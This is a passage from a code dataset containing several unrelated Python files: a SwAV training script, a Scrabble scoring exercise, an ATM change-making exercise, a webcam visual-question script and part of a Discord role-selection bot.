list_from_string(dtype):\r\n def f(arg):\r\n val_list = ast.literal_eval(arg)\r\n if type(val_list) is not list or len(val_list) == 0:\r\n raise ValueError(f'{arg} is an invalid representation for a list')\r\n # check whether all elements can be interpreted as an object of type dtype\r\n for x in val_list:\r\n dtype(x)\r\n return val_list\r\n\r\n f.__name__ = f'{dtype.__name__}_list'\r\n return f\r\n\r\n parser = ArgumentParser(parents=[parent_parser], add_help=False)\r\n\r\n # model params\r\n parser.add_argument(\"--arch\", default=\"resnet50\", type=str, help=\"convnet architecture\")\r\n parser.add_argument(\"--imagenet_pretrained\", default=False, type=true_false,\r\n help=\"Whether to initialize convnet with pretrained imagenet weights. Only available for resnet50\"\r\n )\r\n parser.add_argument('--pretrained_checkpoint', default=None, type=str,\r\n help=\"checkpoint to load pretrained weights from. If none is provided, one from pytorch's model_zoo will be used\"\r\n )\r\n parser.add_argument('--old_pretrained_weights', default=False, type=true_false,\r\n help='If --imagenet_pretrained is True: whether to use older pretrained weights from Jan 2017, or newer ones from Mar 2021. 
Otherwise: no effect.'\r\n )\r\n # specify flags to store false\r\n parser.add_argument(\"--first_conv\", action='store_false')\r\n parser.add_argument(\"--maxpool1\", action='store_false')\r\n parser.add_argument(\"--norm_layer\", type=str, default='batch_norm', action='store', help='batch_norm, group_norm')\r\n parser.add_argument(\"--num_groups\", type=int, default=16, action='store',\r\n help='in case group_norm is chosen as norm_layer, this sets the number of groups'\r\n )\r\n parser.add_argument(\"--hidden_mlp\", default=2048, type=int, help=\"hidden layer dimension in projection head\")\r\n parser.add_argument(\"--feat_dim\", default=128, type=int, help=\"feature dimension\")\r\n parser.add_argument(\"--fp32\", action='store_true')\r\n\r\n # transform params\r\n parser.add_argument(\"--gaussian_blur\", type=true_false, action='store', default=False, help=\"add gaussian blur\")\r\n parser.add_argument(\"--jitter_strength\", type=float, default=1.0, help=\"jitter strength\")\r\n parser.add_argument(\"--dataset\", type=str, default=\"cifar10\", help=\"cifar10, cifar100, office31, imagenet\")\r\n parser.add_argument(\"--data_dir\", type=str, default=\".\", help=\"path to download data\")\r\n\r\n parser.add_argument(\r\n \"--nmb_crops\", type=list_from_string(int), default=[2, 4], help=\"list of number of crops (example: [2, 6])\"\r\n )\r\n parser.add_argument(\r\n \"--size_crops\", type=list_from_string(int), default=[96, 36], help=\"crops resolutions (example: [224, 96])\"\r\n )\r\n parser.add_argument(\r\n \"--min_scale_crops\",\r\n type=list_from_string(float),\r\n default=[0.33, 0.10],\r\n help=\"argument in RandomResizedCrop (example: [0.14, 0.05])\",\r\n )\r\n parser.add_argument(\r\n \"--max_scale_crops\",\r\n type=list_from_string(float),\r\n default=[1, 0.33],\r\n help=\"argument in RandomResizedCrop (example: [1., 0.14])\",\r\n )\r\n\r\n # training params\r\n parser.add_argument(\"--fast_dev_run\", default=1, type=int)\r\n parser.add_argument(\"--num_nodes\", default=1, type=int, help=\"number of nodes for training\")\r\n parser.add_argument(\"--gpus\", default=1, type=int, help=\"number of gpus to train on\")\r\n parser.add_argument(\"--num_workers\", default=8, type=int, help=\"num of workers per GPU\")\r\n parser.add_argument(\"--optimizer\", default=\"adam\", type=str, help=\"choose between adam/lars/sgd\")\r\n parser.add_argument(\"--max_epochs\", default=100, type=int, help=\"number of total epochs to run\")\r\n parser.add_argument(\"--max_steps\", default=-1, type=int, help=\"max steps\")\r\n parser.add_argument(\"--warmup_epochs\", default=10, type=int, help=\"number of warmup epochs\")\r\n parser.add_argument(\"--batch_size\", default=128, type=int, help=\"batch size per gpu\")\r\n\r\n parser.add_argument(\"--weight_decay\", default=1e-6, type=float, help=\"weight decay\")\r\n parser.add_argument(\"--learning_rate\", default=1e-3, type=float, help=\"base learning rate\")\r\n parser.add_argument(\"--start_lr\", default=0, type=float, help=\"initial warmup learning rate\")\r\n parser.add_argument(\"--final_lr\", type=float, default=1e-6, help=\"final learning rate\")\r\n parser.add_argument(\"--backbone_lr_scaling\", type=float, default=1.0, help=\"factor to scale the backbone learning rate with\")\r\n parser.add_argument('--lr_schedule_type', default='cosine', type=str, choices=['constant', 'linear', 'cosine', 'inv_prop'])\r\n\r\n # swav params\r\n parser.add_argument(\r\n \"--crops_for_assign\",\r\n type=list_from_string(int),\r\n default=[0, 1],\r\n help=\"list of 
crops id used for computing assignments\",\r\n )\r\n parser.add_argument(\"--temperature\", default=0.1, type=float, help=\"temperature parameter in training loss\")\r\n parser.add_argument(\r\n \"--epsilon\", default=0.05, type=float, help=\"regularization parameter for Sinkhorn-Knopp algorithm\"\r\n )\r\n parser.add_argument(\r\n \"--sinkhorn_iterations\", default=3, type=int, help=\"number of iterations in Sinkhorn-Knopp algorithm\"\r\n )\r\n parser.add_argument(\"--nmb_prototypes\", default=512, type=int, help=\"number of prototypes\")\r\n parser.add_argument(\r\n \"--queue_length\",\r\n type=int,\r\n default=0,\r\n help=\"length of the queue (0 for no queue); must be divisible by total batch size\"\r\n )\r\n parser.add_argument(\r\n \"--epoch_queue_starts\", type=int, default=15, help=\"from this epoch, we start using a queue\"\r\n )\r\n parser.add_argument(\r\n \"--freeze_prototypes_epochs\",\r\n default=1,\r\n type=int,\r\n help=\"freeze the prototypes during this many epochs from the start\"\r\n )\r\n\r\n parser.add_argument('--supervised_only', type=true_false, action='store', default=False, help='train only using the supervised head')\r\n parser.add_argument('--supervised_hidden_mlp', type=int, default=2048, help='hidden layer of non-linear supervised learning head')\r\n parser.add_argument('--supervised_weight', type=float, default=1., help='weighting factor of supervised loss')\r\n parser.add_argument('--supervised_transforms', type=str, default='default',\r\n choices=['default', 'larger_crop', 'cifar10_transforms'], help='default, larger_crop, cifar10_transforms'\r\n )\r\n parser.add_argument('--supervised_crop_size', type=int, default=-1,\r\n help=('(square) size to crop the images used for supervised training to. '\r\n 'Defaults to the larger one of the multi-crop sizes (usually a sensible choice for best alignment between the swav and supervised objectives). '\r\n 'Needs to be specified for supervised only training. '\r\n 'Note that \"cifar10_transforms\" ignores this argument and always crops to 32x32.')\r\n )\r\n\r\n parser.add_argument('--share_hidden_mlp', type=true_false, default=False,\r\n help=(\"Whether supervised head and swav's projection head should share their hidden layer. If this is set to True, \"\r\n '\"--supervised_hidden_mlp\" will have no effect, and \"--hidden_mlp\" will define the size of the hidden layer used by both heads.')\r\n )\r\n parser.add_argument('--supervised_head_after_proj_head', type=true_false, default=False,\r\n help=(\"Whether to change the architecture such that the supervised head attaches after swav's projection head and the l2norm, \"\r\n 'making the projection head part of the shared parameters. This makes the inputs of the supervised head be in the same space '\r\n 'as the prototypes, which is necessary to perform prototype entropy regularization. '\r\n 'If this is set to True, \"--share_hidden_mlp\" must be set to False.')\r\n )\r\n\r\n parser.add_argument('--prototype_entropy_regularization_weight', type=float, default=0,\r\n help=('Weight of the regularization term that minimizes marginal prototype entropy and maximizes mean prototype entropy. '\r\n 'If a separate optimizer is used, this is simply a factor by which its learning rate is smaller than the first optimizer, '\r\n 'otherwise its a factor the regularization term gets multiplied with before adding it to the total loss. '\r\n 'The default of 0 implicates NO regularization. 
'\r\n 'If this value is set to >0, \"--supervised_head_after_proj_head\" is required to be set to True.')\r\n )\r\n parser.add_argument('--prototype_entropy_regularization_type', type=str, default='same_optimizer', choices=['separate_optimizer', 'same_optimizer'],\r\n help='If a separate optimizer is used, this optimizer ONLY optimizes the prototypes, otherwise the supervised head is also affected by the regularization'\r\n )\r\n\r\n parser.add_argument('--supervised_contrastive', type=true_false, action='store', default=False,\r\n help='Whether to use labels in order to treat samples with the same label as positives for the swav loss'\r\n )\r\n\r\n return parser\r\n\r\n\r\ndef cli_main():\r\n from pl_bolts.datamodules import CIFAR10DataModule, ImagenetDataModule, STL10DataModule\r\n from cifar100_datamodule import CIFAR100DataModule\r\n from Office31 import Office31DataModule\r\n from pl_bolts.models.self_supervised.swav.transforms import SwAVEvalDataTransform, SwAVTrainDataTransform\r\n from pytorch_lightning import loggers as pl_loggers\r\n from torchvision import transforms as transforms\r\n\r\n parser = ArgumentParser(allow_abbrev=False)\r\n\r\n parser.add_argument('--wandb_project', default='uncategorized', type=str, help='name of the wandb project to save this run in')\r\n parser.add_argument('--wandb_log_dir', default='wandb_logs', type=str, help='directory to save wandb logs in')\r\n parser.add_argument('--hyperparameter_checkpoint', type=str,\r\n help=(\r\n 'A checkpoint can be specified the hyperparameters of which will be extracted and used for this run. '\r\n 'Parameters can still be overwritten using the command line arguments. '\r\n 'Basically, the hyperparameters of this checkpoint act as the default values of the arguments (instead of the hard-coded ones). 
'\r\n )\r\n )\r\n parser.add_argument('--wandb_run_name', default=None, type=str, help='custom name for this run in wandb')\r\n parser.add_argument('--hyperparameter_artifact', type=str,\r\n help='The same as \"--hyperparameter_checkpoint\", but the checkpoint is specified as a wandb artifact'\r\n )\r\n parser.add_argument('--artifact_dir', type=str, action='store', default='wandb_artifacts', help='directory to save wandb artifacts in')\r\n parser.add_argument('--wandb_entity', type=str, help='name of the wandb entity (account) to load an artifact from')\r\n parser.add_argument('--logger_prefix', default='supervised_swav', type=str,\r\n help='prefix to the name of all the logged metrics (empty string for no prefix)',\r\n )\r\n\r\n # model args\r\n parser = SupervisedSwAV.add_model_specific_args(parser)\r\n args = parser.parse_args()\r\n\r\n assert (args.hyperparameter_checkpoint is None) or (args.hyperparameter_artifact is None), \\\r\n 'Only hyperparameter_checkpoint or hyperparameter_artifact can be specified'\r\n\r\n if args.hyperparameter_checkpoint is not None:\r\n assert os.path.isfile(args.hyperparameter_checkpoint), 'The specified checkpoint file does not exist'\r\n\r\n logger = pl_loggers.WandbLogger(\r\n save_dir=args.wandb_log_dir,\r\n project=args.wandb_project,\r\n prefix=args.logger_prefix,\r\n log_model=True,\r\n )\r\n logger.LOGGER_JOIN_CHAR = '/'\r\n\r\n if args.hyperparameter_artifact is not None:\r\n assert args.wandb_entity is not None, \"Need to specify a wandb_entity to load an artifact\"\r\n artifact_dirname = args.hyperparameter_artifact.replace(\":\", \"-\")\r\n\r\n if type(logger.experiment) is not pl_loggers.base.DummyExperiment:\r\n artifact = logger.experiment.use_artifact(f'{args.wandb_entity}/{args.wandb_project}/{args.hyperparameter_artifact}', type='model')\r\n if not os.path.isdir(os.path.join(args.artifact_dir, artifact_dirname)):\r\n # artifact has not been downloaded yet -> download artifact and store its path in hyperparameter_checkpoint\r\n args.hyperparameter_checkpoint = os.path.join(\r\n artifact.download(os.path.join(\r\n args.artifact_dir,\r\n artifact_dirname\r\n )),\r\n 'model.ckpt'\r\n )\r\n else:\r\n # artifact is already downloaded, because it was used before -> just store its path in hyperparameter_checkpoint\r\n args.hyperparameter_checkpoint = os.path.join(\r\n args.artifact_dir,\r\n artifact_dirname,\r\n 'model.ckpt'\r\n )\r\n else:\r\n # we got a DummyExperiment -> we are not rank 0\r\n # wait until the rank 0 process downloaded the artifact, then use it to obtain the hyperparameters\r\n while not os.path.isdir(os.path.join(args.artifact_dir, artifact_dirname)):\r\n pass\r\n # now the file exists, but it might still be in the process of downloading\r\n args.hyperparameter_checkpoint = os.path.join(\r\n args.artifact_dir,\r\n artifact_dirname,\r\n 'model.ckpt'\r\n )\r\n\r\n if args.hyperparameter_checkpoint is not None:\r\n while True:\r\n try:\r\n hyperparameters = load_checkpoint(args.hyperparameter_checkpoint)['hyper_parameters']\r\n break\r\n except:\r\n print('Waiting for download...')\r\n sleep(1)\r\n\r\n # overwrite arguments that were explicitly specified in the command line\r\n hyperparameters.update({k: v for k, v in args.__dict__.items() if any(f'--{k}' in arg for arg in sys.argv)})\r\n # * this assumes \"_\" in argument names, NOT \"-\"\r\n # * and it assumes no shortcut names for arguments\r\n\r\n args.__dict__ = hyperparameters\r\n\r\n assert not (args.supervised_only and args.supervised_contrastive), 'No contrastive 
objective present when training purely supervised'\r\n\r\n    logger.experiment.name = '/'.join([\r\n        args.dataset,\r\n        \"supervised\" if args.supervised_only else \"supervised_swav\"] +\r\n        ([args.hyperparameter_artifact] if 'hyperparameter_artifact' in args.__dict__ and args.hyperparameter_artifact is not None else ([os.path.basename(args.hyperparameter_checkpoint)] if 'hyperparameter_checkpoint' in args.__dict__ and args.hyperparameter_checkpoint is not None else [])) +\r\n        ([args.wandb_run_name] if args.wandb_run_name else [])\r\n    )\r\n\r\n    if args.dataset == 'stl10':\r\n        raise NotImplementedError(\"stl10 has not yet been implemented for the supervised setting\")\r\n        dm = STL10DataModule(data_dir=args.data_dir, batch_size=args.batch_size, num_workers=args.num_workers)\r\n\r\n        dm.train_dataloader = dm.train_dataloader_mixed\r\n        dm.val_dataloader = dm.val_dataloader_mixed\r\n        args.num_samples = dm.num_unlabeled_samples\r\n\r\n        args.maxpool1 = False\r\n\r\n        normalization = stl10_normalization()\r\n    elif args.dataset == 'cifar10':\r\n        dm = CIFAR10DataModule(data_dir=args.data_dir, batch_size=args.batch_size, num_workers=args.num_workers)\r\n\r\n        args.num_samples = dm.num_samples\r\n\r\n        args.maxpool1 = False\r\n        args.first_conv = False\r\n\r\n        normalization = cifar10_normalization()\r\n    elif args.dataset == 'cifar100':\r\n        dm = CIFAR100DataModule(data_dir=args.data_dir, batch_size=args.batch_size, num_workers=args.num_workers)\r\n\r\n        args.num_samples = dm.num_samples\r\n\r\n        args.maxpool1 = False\r\n        args.first_conv = False\r\n\r\n        normalization = cifar10_normalization()\r\n    elif args.dataset.startswith('office31'):\r\n        if len(args.dataset) < 9 or args.dataset[8] != ':':\r\n            raise ValueError('Violated expected format for office31 dataset name: \"office31:<domain>\", e.g. \"office31:amazon\"')\r\n\r\n        train_domain = args.dataset[9:]\r\n        dm = Office31DataModule(data_dir=args.data_dir, batch_size=args.batch_size, num_workers=args.num_workers, domain=train_domain, val_split=0)\r\n        args.num_samples = dm.num_samples\r\n\r\n        normalization = imagenet_normalization()\r\n\r\n        # use training sets of the other domains as validation during training on this domain\r\n        val_domains = [domain for domain in ('amazon', 'dslr', 'webcam') if domain != train_domain]\r\n        val_dataloaders = []\r\n        for domain in val_domains:\r\n            val_dm = Office31DataModule(data_dir=args.data_dir, batch_size=args.batch_size, num_workers=args.num_workers, domain=domain, val_split=0.2)\r\n\r\n            val_dm.train_transforms = SwAVEvalDataTransform(\r\n                normalize=normalization,\r\n                size_crops=args.size_crops,\r\n                nmb_crops=args.nmb_crops,\r\n                min_scale_crops=args.min_scale_crops,\r\n                max_scale_crops=args.max_scale_crops,\r\n                gaussian_blur=args.gaussian_blur,\r\n                jitter_strength=args.jitter_strength\r\n            )\r\n            if args.supervised_only:\r\n                val_dm.train_transforms.transform = [val_dm.train_transforms.transform[-1]]\r\n            val_dm.train_transforms.transform[-1] = transforms.Compose([\r\n                transforms.ToTensor(),\r\n                normalization,\r\n            ])\r\n            val_dm.setup(stage='fit')\r\n\r\n            val_dataloaders.append(val_dm.train_dataloader())\r\n\r\n        dm.val_dataloader = lambda: val_dataloaders\r\n        args.val_names = val_domains\r\n\r\n    elif args.dataset == 'imagenet':\r\n        args.maxpool1 = True\r\n        args.first_conv = True\r\n        normalization = imagenet_normalization()\r\n\r\n        args.size_crops = [224, 96]\r\n        args.nmb_crops = [2, 6]\r\n        args.min_scale_crops = [0.14, 0.05]\r\n        args.max_scale_crops = [1., 0.14]\r\n        args.gaussian_blur = True\r\n        args.jitter_strength = 1.\r\n\r\n        args.batch_size 
= 64\r\n args.num_nodes = 8\r\n args.gpus = 8 # per-node\r\n args.max_epochs = 800\r\n\r\n args.optimizer = 'lars'\r\n args.learning_rate = 4.8\r\n args.final_lr = 0.0048\r\n args.start_lr = 0.3\r\n\r\n args.nmb_prototypes = 3000\r\n\r\n dm = ImagenetDataModule(data_dir=args.data_dir, batch_size=args.batch_size, num_workers=args.num_workers)\r\n\r\n args.num_samples = dm.num_samples\r\n args.input_height = dm.size()[-1]\r\n else:\r\n raise NotImplementedError(\"other datasets have not been implemented till now\")\r\n\r\n args.num_classes = dm.num_classes\r\n\r\n if args.supervised_only:\r\n # if only supervised training is done, don't create swav-specific layers of resnet\r\n args.nmb_prototypes = 0\r\n if not args.supervised_head_after_proj_head:\r\n args.feat_dim = 0\r\n\r\n dm.train_transforms = SwAVTrainDataTransform(\r\n normalize=normalization,\r\n size_crops=args.size_crops,\r\n nmb_crops=args.nmb_crops,\r\n min_scale_crops=args.min_scale_crops,\r\n max_scale_crops=args.max_scale_crops,\r\n gaussian_blur=args.gaussian_blur,\r\n jitter_strength=args.jitter_strength\r\n )\r\n if args.supervised_only:\r\n dm.train_transforms.transform = [dm.train_transforms.transform[-1]]\r\n\r\n if args.supervised_crop_size < 0:\r\n assert not args.supervised_only, 'For supervised_only, supervised_crop_size needs to be specified'\r\n args.supervised_crop_size = args.size_crops[0]\r\n\r\n # set the augmentation transforms for supervised training\r\n if args.supervised_transforms == 'cifar10_transforms':\r\n args.supervised_crop_size = 32\r\n # the augmentations used for cifar10 in the resnet paper\r\n # https://arxiv.org/pdf/1512.03385.pdf\r\n # or in\r\n # https://github.com/kentaroy47/pytorch-lightning-tryouts/blob/master/cifar10.py\r\n dm.train_transforms.transform[-1] = transforms.Compose([\r\n transforms.RandomCrop(32, padding=4),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor(),\r\n normalization,\r\n ])\r\n elif args.supervised_transforms == 'larger_crop':\r\n dm.train_transforms.transform[-1] = transforms.Compose([\r\n transforms.RandomResizedCrop(args.supervised_crop_size, scale=(0.3125, 1.0)),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor(),\r\n normalization,\r\n ])\r\n else:\r\n # the default ones as defined in SwAVTrainDataTransform:\r\n dm.train_transforms.transform[-1] = transforms.Compose([\r\n transforms.RandomResizedCrop(args.supervised_crop_size),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor(),\r\n normalization,\r\n ])\r\n\r\n dm.val_transforms = SwAVEvalDataTransform(\r\n normalize=normalization,\r\n size_crops=args.size_crops,\r\n nmb_crops=args.nmb_crops,\r\n min_scale_crops=args.min_scale_crops,\r\n max_scale_crops=args.max_scale_crops,\r\n gaussian_blur=args.gaussian_blur,\r\n jitter_strength=args.jitter_strength\r\n )\r\n if args.supervised_only:\r\n dm.val_transforms.transform = [dm.val_transforms.transform[-1]]\r\n\r\n dm.val_transforms.transform[-1] = transforms.Compose([\r\n transforms.ToTensor(),\r\n normalization,\r\n ])\r\n\r\n # swav model init\r\n model = SupervisedSwAV(**args.__dict__)\r\n\r\n lr_monitor = LearningRateMonitor(logging_interval=\"step\")\r\n model_checkpoint = ModelCheckpoint(\r\n save_last=not args.dataset.startswith('office31'),\r\n save_top_k=1,\r\n monitor='val/joint_loss' if not args.dataset.startswith('office31') else\r\n ('val/webcam/joint_loss' if args.dataset.endswith('amazon') else 'val/amazon/joint_loss')\r\n )\r\n callbacks = [model_checkpoint, lr_monitor]\r\n\r\n trainer = pl.Trainer(\r\n 
max_epochs=args.max_epochs,\r\n        max_steps=None if args.max_steps == -1 else args.max_steps,\r\n        gpus=args.gpus,\r\n        num_nodes=args.num_nodes,\r\n        distributed_backend='ddp' if args.gpus > 1 else None,\r\n        sync_batchnorm=True if args.gpus > 1 else False,\r\n        precision=32 if args.fp32 else 16,\r\n        callbacks=callbacks,\r\n        fast_dev_run=args.fast_dev_run,\r\n        logger=logger,\r\n    )\r\n\r\n    trainer.fit(model, datamodule=dm)\r\n\r\n\r\nif __name__ == '__main__':\r\n    cli_main()\r\n","repo_name":"AlexanderBartler/TTAPS","sub_path":"src/supervised_swav_module.py","file_name":"supervised_swav_module.py","file_ext":"py","file_size_in_byte":54677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"73526710451","text":"# Starting code\nletters = [\"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\", \"H\", \"I\", \"J\", \"K\", \"L\", \"M\", \"N\", \"O\", \"P\", \"Q\", \"R\", \"S\", \"T\", \"U\", \"V\", \"W\", \"X\", \"Y\", \"Z\"]\npoints = [1, 3, 3, 2, 1, 4, 2, 4, 1, 8, 5, 1, 3, 4, 1, 3, 10, 1, 1, 1, 1, 4, 4, 8, 4, 10]\n\n# ===================================\n# Build your Point Dictionary Section\n# ===================================\n# Task 1: Create dictionary using a dictionary comprehension and zip\nletter_to_points = {letter: point for letter, point in zip(letters, points)}\n\n# Task 2: Add key value pair to dictionary\nletter_to_points[\" \"] = 0\n\n# ====================\n# Score a Word Section\n# ====================\n# Task 3: Write function score_word\ndef score_word(word):\n    # Task 4: Create variable point_total\n    point_total = 0\n    # Task 5: Iterate through word and add point values to point_total\n    for letter in word:\n        # Add point value from dictionary to point_total. Default to 0 if letter is not in dictionary\n        # Task 15: Extra - Make input work with lowercase letters\n        point_total += letter_to_points.get(letter.upper(), 0)\n    # Task 6: Return point_total\n    return point_total\n# Task 7: Test score_word function with BROWNIE\nbrownie_points = score_word(\"BROWNIE\")\n# Task 8: Print brownie_points. Should print 15.\nprint(brownie_points)\n\n# ====================\n# Score a Game Section\n# ====================\n# Task 9: Create dictionary\nplayer_to_words = {\n    \"player1\": [\"BLUE\", \"TENNIS\", \"EXIT\"],\n    \"wordNerd\": [\"EARTH\", \"EYES\", \"MACHINE\"],\n    \"Lexi Con\": [\"ERASER\", \"BELLY\", \"HUSKY\"],\n    \"Prof Reader\": [\"ZAP\", \"COMA\", \"PERIOD\"]\n}\n\n# Task 10: Create empty dictionary\nplayer_to_points = {}\n\n# Task 11: Iterate through items in player_to_words. Create player_points and set to 0.\nfor player, words in player_to_words.items():\n    # Create variable\n    player_points = 0\n    # Task 12: Iterate through words and add value of word using score_word\n    for word in words:\n        # Add value of word to player_points\n        player_points += score_word(word)\n    # Task 13: Add key value pair to player_to_points using player and player_points\n    player_to_points[player] = player_points\n# Task 14: Print player_to_points. wordNerd should be winning by 1 point.\nprint(player_to_points)\n\n
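# Worked scoring example (values taken from the points list above):\n# score_word(\"ZAP\") = Z(10) + A(1) + P(3) = 14\n# score_word(\"BROWNIE\") = 3 + 1 + 1 + 4 + 4 + 1 + 1 = 15, matching brownie_points.\n\n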
Section\n# ===================================\n# Task 15: Extra Functions\n# - update_point_totals: Nested loop from Task 11 to Task 13 to be called when a word is played\n# - play_word: Takes a player and word and adds word to player's list of words\n#              Able to score lowercase inputs as well - Code is labeled as Task 15: Extra above.\n# Write update_point_totals function\ndef update_point_totals():\n    # Iterate through player_to_words\n    for player, words in player_to_words.items():\n        # Create variable\n        player_points = 0\n        # Iterate through words\n        for word in words:\n            # Add value of word to player_points\n            player_points += score_word(word)\n        # Add key value pair to player_points using player and player_points\n        player_to_points[player] = player_points\n\n# Write play_word function\ndef play_word(player, word):\n    # Append word to player's list of words\n    player_to_words.get(player).append(word)\n    # Call update_point_totals\n    update_point_totals()\n    # Print player_to_points\n    print(player_to_points)\n\n# Test play_word function\nplay_word(\"player1\", \"COOKIE\")\n# Test play_word function\nplay_word(\"wordNerd\", \"Water\")\n","repo_name":"josejpalacios/codecademy-python3","sub_path":"Lesson 08: Dictionaries/Project 01: Scrabble.py","file_name":"Project 01: Scrabble.py","file_ext":"py","file_size_in_byte":3405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74529049651","text":"# saque = int(input('Que valor você quer sacar? R$')) #1234\n#\n# cinquenta = saque // 50 #24\n# diferenca1 = cinquenta * 50 #1200\n#\n# vinte = (saque - diferenca1) // 20 #1\n# diferenca2 = vinte * 20 #20\n#\n# dez = (saque - (diferenca1 + diferenca2)) // 10 #1\n# diferenca3 = dez * 10 #10\n#\n# um = (saque - (diferenca1 + diferenca2 + diferenca3)) // 1 #4\n#\n# print(f'Total de {cinquenta} cédulas de R$50')\n# print(f'Total de {vinte} cédulas de R$20')\n# print(f'Total de {dez} cédulas de R$10')\n# print(f'Total de {um} cédulas de R$1')\n\n\n'''GUANABARA'''\n# Checks the remaining amount of money, the 'total': keeps taking R$50 notes while it can,\n# checks how much is left and keeps taking R$20 notes while it can,\n# checks how much is left and keeps taking R$10 notes and, lastly,\n# checks how much is left and keeps taking R$1 notes.\nprint('=' * 30)\nprint('{:^30}'.format('BANCO CEV'))\nprint('=' * 30)\nvalor = int(input('Que valor você quer sacar? R$'))\ntotal = valor\ncéd = 50\ntotcéd = 0\nwhile True:\n    if total >= céd:\n        total -= céd\n        totcéd += 1\n    else:\n        if totcéd > 0:\n            print(f'Total de {totcéd} cédulas de R${céd}')\n        if céd == 50:\n            céd = 20\n        elif céd == 20:\n            céd = 10\n        elif céd == 10:\n            céd = 1\n        totcéd = 0\n    if total == 0:\n        break\nprint('=' * 30)\nprint('Volta sempre ao BANCO CEV! 
Tenha um bom dia!')\n\n","repo_name":"JaymersonFerreira/python-guanabara","sub_path":"exercicios/ex071.py","file_name":"ex071.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12283430785","text":"import os\nfrom dotenv import load_dotenv\n\nimport cv2\n\nimport pynput\nfrom pynput import keyboard\nimport base64\nimport requests\nimport json\n\nload_dotenv()\n\n\ndef on_release(key):\n    if 'char' in dir(key):\n        if key.char == \"p\":\n            print(\"\\nphoto\")\n\n            # Turn on the camera\n            cam = cv2.VideoCapture(0)\n            ret, img = cam.read()\n\n            if ret:\n                # scale_percent = 60 # percent of original size\n                # width = int(img.shape[1] * scale_percent / 100)\n                # height = int(img.shape[0] * scale_percent / 100)\n                # dim = (width, height)\n\n                # resized = cv2.resize(img, dim, interpolation=cv2.INTER_AREA)\n\n                # cv2.imshow(\"test\", resized)\n                # cv2.waitKey()\n                # cv2.destroyAllWindows()\n\n                # Convert the image to base64\n                retval, buffer = cv2.imencode('.jpg', img)\n                jpg_as_text = base64.b64encode(buffer).decode('utf-8')\n                dataurl = f'data:image/jpg;base64,{jpg_as_text}'\n\n                # Request to the API\n                # Leave the question empty for just an automatic description of the image\n                question = \"Is the person giving a thumbs up or down? answer:\"\n\n                resp = requests.post(\n                    os.getenv('DOMAIN'),\n                    json={\"image\": dataurl,\n                          \"visualQuestion\": question},\n                    headers={\"Content-Type\": \"application/json\"})\n                answer = resp.json()\n\n                output = answer[\"prediction\"][\"output\"]\n                print(output)\n\n            cam.release()\n\n\n# Keyboard events\nwith keyboard.Listener(\n    # on_press=on_press,\n    on_release=on_release) as listener:\n    listener.join()\n","repo_name":"mmattm/camera-obscura-python","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2602572617","text":"from typing import List\n\nimport discord\nfrom discord import Interaction\n\nfrom main.constants import roles_categories, fluency_levels, misc_roles, pronoun_roles\nfrom main.views.view_components.buttons import FluencyLevelButton, MiscRoleButton, PageChangeButton, PronounRoleButton\nfrom main.views.view_components.dropdowns import RolesCategoryDropdown, NativeLanguagesDropdown\n\n# Creates subclass for viewing the role buttons\nclass RolesView(discord.ui.View):\n\n    # Creates buttons and dropdown menus for the /roles command\n    def __init__(self):\n        super().__init__()\n        self.nativelanguages_dropdown = None\n        self.pagechange_buttons: List[PageChangeButton] = []\n        dropdown = RolesCategoryDropdown(self.on_rolescategory_dropdown_select)\n        self.add_item(dropdown)\n\n    def fluency_level_buttons(self):\n        buttons = []\n        for fluency_level in fluency_levels:\n            button = FluencyLevelButton(fluency_level, self.on_fluencylevel_button_click)\n            buttons.append(button)\n        return buttons\n\n    def misc_role_buttons(self):\n        buttons = []\n        for misc_role in misc_roles:\n            button = MiscRoleButton(misc_role, self.on_miscrole_button_click)\n            buttons.append(button)\n        return buttons\n    \n    def pronoun_role_buttons(self):\n        buttons = []\n        for pronoun_role in pronoun_roles:\n            button = PronounRoleButton(pronoun_role, self.on_pronoun_button_click)\n            buttons.append(button)\n        return buttons\n\n    def page_change_buttons(self):\n        return [\n            PageChangeButton(PageChangeButton.PageChangeButtonType.prev_page, self.on_pagechange_button_click),\n            
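# note: both page-change buttons share one callback; the handler\n            # on_pagechange_button_click below picks the direction from button.label\n            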
PageChangeButton(PageChangeButton.PageChangeButtonType.next_page, self.on_pagechange_button_click)\n ]\n\n # Code to be executed when choosing a category on the role category dropdown menu\n async def on_rolescategory_dropdown_select(self, dropdown: RolesCategoryDropdown, interaction: Interaction):\n self.clear_items()\n selection = dropdown.values[0]\n # Displays respective menu depending on the role category chosen\n if selection == roles_categories[0].code:\n buttons = self.fluency_level_buttons()\n for button in buttons:\n self.add_item(button)\n await interaction.response.edit_message(content=\"What is your fluency level in English? If you aren't sure, choose Intermediate.\", view=self)\n elif selection == roles_categories[1].code:\n self.nativelanguages_dropdown = NativeLanguagesDropdown(self.on_nativelanguages_dropdown_select)\n self.add_item(self.nativelanguages_dropdown)\n for button in self.page_change_buttons():\n self.pagechange_buttons.append(button)\n self.add_item(button)\n await interaction.response.edit_message(content=\"Select your native language...\", view=self)\n elif selection == roles_categories[2].code:\n buttons = self.misc_role_buttons()\n for button in buttons:\n self.add_item(button)\n await interaction.response.edit_message(content=\"Select other roles...\", view=self)\n elif selection == roles_categories[3].code:\n buttons = self.pronoun_role_buttons()\n for button in buttons:\n self.add_item(button)\n await interaction.response.edit_message(content=\"Select pronoun roles...\", view=self)\n \n # Code to be executed when choosing a native language on the native language dropdown menu\n async def on_nativelanguages_dropdown_select(self, dropdown: NativeLanguagesDropdown, interaction: Interaction):\n self.clear_items()\n for value in dropdown.values:\n role = interaction.guild.get_role(int(value))\n await interaction.user.add_roles(role)\n\n await interaction.response.edit_message(content=\"Role added! You can now dismiss this message.\", view=self)\n \n # Code to be executed when choosing a role on the misc role menu\n async def on_miscrole_button_click(self, button: MiscRoleButton, interaction: Interaction):\n self.clear_items()\n interaction_user = interaction.user\n requested_role = interaction.guild.get_role(button.role_id)\n 